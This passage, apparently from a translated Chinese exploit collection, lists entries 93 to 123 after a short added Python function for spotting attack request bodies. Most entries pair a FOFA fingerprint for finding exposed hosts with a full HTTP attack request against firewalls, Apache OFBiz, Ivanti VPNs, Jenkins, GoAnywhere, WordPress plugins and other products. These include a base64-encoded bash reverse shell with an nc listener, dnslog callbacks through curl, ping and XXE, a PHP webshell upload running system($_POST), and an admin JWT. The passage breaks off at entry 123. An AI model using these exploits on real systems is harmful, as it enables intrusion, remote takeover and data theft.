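Several PoCs in this list carry their payload in the request body, where an access log never sees it: the .NET Process gadget that closes entry 56, the SOAP injection of 64, the FreeMarker templates of 76 and 84, the form fields of 82, 86 and 90, and the Fastjson request of 92. The function below is an added example (not from the original post or from any vendor) of the body-side checks a reverse proxy, WAF or application request dump can apply. Rule names, the list of form fields treated as command sinks, and the sample bodies are assumptions constructed from the PoCs above; the Fastjson @type class names are the standard gadget prefixes rather than anything the elided PAYLOAD shows.

```python
"""Body-side signatures for the POST-only PoCs (entries 56, 64, 76, 82, 84, 86, 90, 92).

Added example. SAMPLES are constructed from the PoC bodies printed above;
the field lists and rule names are choices made here, not vendor data.
"""
import ipaddress
import re
from urllib.parse import parse_qs

# Content-type-agnostic patterns: each is the element the PoC cannot do without.
BODY_RULES = [
    ("Freemarker ?new() (76/84)",
     re.compile(r"\?new\(\)|freemarker\.template\.utility\.Execute")),
    ("MSSQL time-based SQLi in SOAP/XML (64)",
     re.compile(r"waitfor\s+delay\s*'", re.I)),
    ("Fastjson/.NET type-hinted JSON (56/92)",
     re.compile(r'"(?:@type|\$type|__type)"\s*:\s*"(?:System\.Diagnostics\.Process'
                r'|com\.sun\.rowset\.JdbcRowSetImpl|javax\.naming|org\.apache\.commons)', re.I)),
]
# Form fields the PoCs feed straight to a shell: 86 (host), 82 (z2), 90 (jsondata[ip]).
SHELL_META = re.compile(r"[|;`\n\r]|\$\(|\$\{IFS\}")
COMMAND_FIELDS = {"host", "z2"}
PING_TARGET_FIELDS = {"jsondata[ip]"}  # ping.php should only ever see an IP literal


def _is_ip(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def scan_body(content_type, body):
    """Return the rule names matched by one request body (empty list = clean)."""
    hits = [name for name, pat in BODY_RULES if pat.search(body)]
    if content_type.split(";")[0].strip() == "application/x-www-form-urlencoded":
        # parse_qs percent-decodes, so %0a becomes a real newline for SHELL_META.
        for field, values in parse_qs(body, keep_blank_values=True).items():
            if field in COMMAND_FIELDS and any(SHELL_META.search(v) for v in values):
                hits.append(f"shell metacharacters in form field {field!r}")
            if field in PING_TARGET_FIELDS and not all(_is_ip(v) for v in values):
                hits.append(f"non-IP value in ping target {field!r}")
    return hits


# Constructed samples, shortened from the PoC bodies above.
SAMPLES = {
    "56 dotnet json": '{"MethodName":"Start","ObjectInstance":{"__type":"System.Diagnostics.Process,'
                      ' System, Version=4.0.0.0","StartInfo":{"FileName":"cmd","Arguments":"/c ping x"}}}',
    "64 soap": '<soap:Body><GetOSpById xmlns="http://tempuri.org/"><sId>1\';waitfor delay '
               "'0:0:5'--+</sId></GetOSpById></soap:Body>",
    "84 jimureport": '{"sql": "<#assign ex=\\"freemarker.template.utility.Execute\\"?new()>'
                     '${ex(\\"id\\")}", "type": "0"}',
    "86 tosei": "host=%0acat${IFS}/etc/passwd%0a&command=ping",
    "82 logbase": 'z1=1&z2="|id;"&z3=bhost',
    "90 hikvision ping": "jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig",
    "benign ping": "jsondata%5Btype%5D=99&jsondata%5Bip%5D=10.0.0.1",
}
FORM = "application/x-www-form-urlencoded"

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        ctype = FORM if "=" in body and not body.startswith(("{", "<")) else "application/json"
        print(f"{label:18} -> {scan_body(ctype, body)}")
```

The ping.php rule deliberately does not look for shell metacharacters: entry 90 runs ipconfig with no metacharacter at all, because the parameter itself is the command, so the only safe test is whether the value parses as an IP address.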
93. Qi An Xin (奇安信) NetGod SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then fetch the uploaded file:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast 盈可视 HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the XML file's contents; the XML file is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 cstecgi.cgi getSysStatusCfg settings information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: (replace with your own token)
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-Type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account/password is admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


File path: /upload/2.php

121. Beijing Baichuo (北京百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo (北京百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
